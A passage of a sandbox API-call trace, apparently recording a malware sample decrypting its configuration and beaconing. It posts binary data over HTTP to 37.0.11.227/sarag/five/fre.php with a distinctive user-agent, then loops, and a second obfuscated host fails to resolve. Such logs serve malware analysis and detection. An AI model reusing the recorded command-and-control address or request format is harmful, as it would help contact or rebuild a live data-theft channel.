phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.198] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.199] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.199] GetProcessHeap () returned 0x690000 [0338.200] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0338.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.201] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0338.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.202] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.203] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0338.203] GetProcessHeap () returned 0x690000 [0338.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.204] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0338.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.205] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0338.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.206] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0338.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.206] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0338.206] GetProcessHeap () returned 0x690000 [0338.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0338.207] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0338.207] GetProcessHeap () returned 0x690000 [0338.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0338.207] socket (af=2, type=1, protocol=6) returned 0xc1c [0338.207] connect (s=0xc1c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0338.232] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0338.232] GetProcessHeap () returned 0x690000 [0338.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0338.232] GetProcessHeap () returned 0x690000 [0338.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0338.233] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.234] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0338.234] GetProcessHeap () returned 0x690000 [0338.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0338.234] GetProcessHeap () returned 0x690000 [0338.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.234] GetProcessHeap () returned 0x690000 [0338.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0338.234] GetProcessHeap () returned 0x690000 [0338.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0338.235] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.236] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0338.236] GetProcessHeap () returned 0x690000 [0338.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0338.236] GetProcessHeap () returned 0x690000 [0338.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.236] send (s=0xc1c, buf=0x6ad508*, len=242, flags=0) returned 242 [0338.237] send (s=0xc1c, buf=0x6aba40*, len=159, flags=0) returned 159 [0338.237] GetProcessHeap () returned 0x690000 [0338.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0338.237] recv (in: s=0xc1c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0338.319] GetProcessHeap () returned 0x690000 [0338.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0338.320] GetProcessHeap () returned 0x690000 [0338.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0338.320] GetProcessHeap () returned 0x690000 [0338.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0338.320] GetProcessHeap () returned 0x690000 [0338.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0338.321] closesocket (s=0xc1c) returned 0 [0338.322] GetProcessHeap () returned 0x690000 [0338.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0338.322] GetProcessHeap () returned 0x690000 [0338.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.322] GetProcessHeap () returned 0x690000 [0338.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0338.322] GetProcessHeap () returned 0x690000 [0338.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0338.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x196c) returned 0xc1c [0338.325] Sleep (dwMilliseconds=0xea60) [0338.326] GetProcessHeap () returned 0x690000 [0338.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0338.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.328] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.334] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0338.344] GetProcessHeap () returned 0x690000 [0338.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0338.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.346] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.349] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.350] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.350] GetProcessHeap () returned 0x690000 [0338.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0338.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.351] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0338.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.353] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.354] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0338.354] GetProcessHeap () returned 0x690000 [0338.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.355] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0338.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.356] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0338.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.357] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0338.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.358] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0338.358] GetProcessHeap () returned 0x690000 [0338.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0338.358] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0338.358] GetProcessHeap () returned 0x690000 [0338.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0338.365] GetProcessHeap () returned 0x690000 [0338.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.365] GetProcessHeap () returned 0x690000 [0338.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0338.366] GetProcessHeap () returned 0x690000 [0338.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0338.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0338.378] GetProcessHeap () returned 0x690000 [0338.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0338.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.379] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0338.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.380] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.383] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.383] GetProcessHeap () returned 0x690000 [0338.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0338.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.385] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0338.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.386] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0338.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.387] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0338.387] GetProcessHeap () returned 0x690000 [0338.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.388] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0338.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.388] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0338.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.389] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0338.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.391] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0338.391] GetProcessHeap () returned 0x690000 [0338.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0338.392] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0338.392] GetProcessHeap () returned 0x690000 [0338.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0338.392] socket (af=2, type=1, protocol=6) returned 0xc20 [0338.394] connect (s=0xc20, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0338.420] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0338.420] GetProcessHeap () returned 0x690000 [0338.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0338.421] GetProcessHeap () returned 0x690000 [0338.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0338.421] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.422] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0338.422] GetProcessHeap () returned 0x690000 [0338.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0338.422] GetProcessHeap () returned 0x690000 [0338.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.423] GetProcessHeap () returned 0x690000 [0338.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0338.423] GetProcessHeap () returned 0x690000 [0338.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0338.424] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.426] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0338.426] GetProcessHeap () returned 0x690000 [0338.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0338.426] GetProcessHeap () returned 0x690000 [0338.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.427] send (s=0xc20, buf=0x6ad508*, len=242, flags=0) returned 242 [0338.427] send (s=0xc20, buf=0x6aba40*, len=159, flags=0) returned 159 [0338.427] GetProcessHeap () returned 0x690000 [0338.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0338.427] recv (in: s=0xc20, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0338.504] GetProcessHeap () returned 0x690000 [0338.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0338.507] GetProcessHeap () returned 0x690000 [0338.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0338.508] GetProcessHeap () returned 0x690000 [0338.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0338.508] GetProcessHeap () returned 0x690000 [0338.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0338.509] closesocket (s=0xc20) returned 0 [0338.512] GetProcessHeap () returned 0x690000 [0338.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0338.512] GetProcessHeap () returned 0x690000 [0338.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.513] GetProcessHeap () returned 0x690000 [0338.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0338.513] GetProcessHeap () returned 0x690000 [0338.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0338.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1970) returned 0xc20 [0338.520] Sleep (dwMilliseconds=0xea60) [0338.522] GetProcessHeap () returned 0x690000 [0338.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0338.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.532] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0338.540] GetProcessHeap () returned 0x690000 [0338.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0338.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.541] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.554] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.555] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.555] GetProcessHeap () returned 0x690000 [0338.555] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0338.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.556] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0338.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.557] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.558] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0338.558] GetProcessHeap () returned 0x690000 [0338.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.559] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0338.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.562] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0338.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.562] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0338.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.563] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0338.563] GetProcessHeap () returned 0x690000 [0338.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0338.563] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0338.564] GetProcessHeap () returned 0x690000 [0338.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0338.564] GetProcessHeap () returned 0x690000 [0338.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.565] GetProcessHeap () returned 0x690000 [0338.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0338.565] GetProcessHeap () returned 0x690000 [0338.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0338.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0338.586] GetProcessHeap () returned 0x690000 [0338.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0338.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.587] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.588] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.589] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.589] GetProcessHeap () returned 0x690000 [0338.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0338.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.590] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0338.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.592] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.657] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0338.657] GetProcessHeap () returned 0x690000 [0338.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 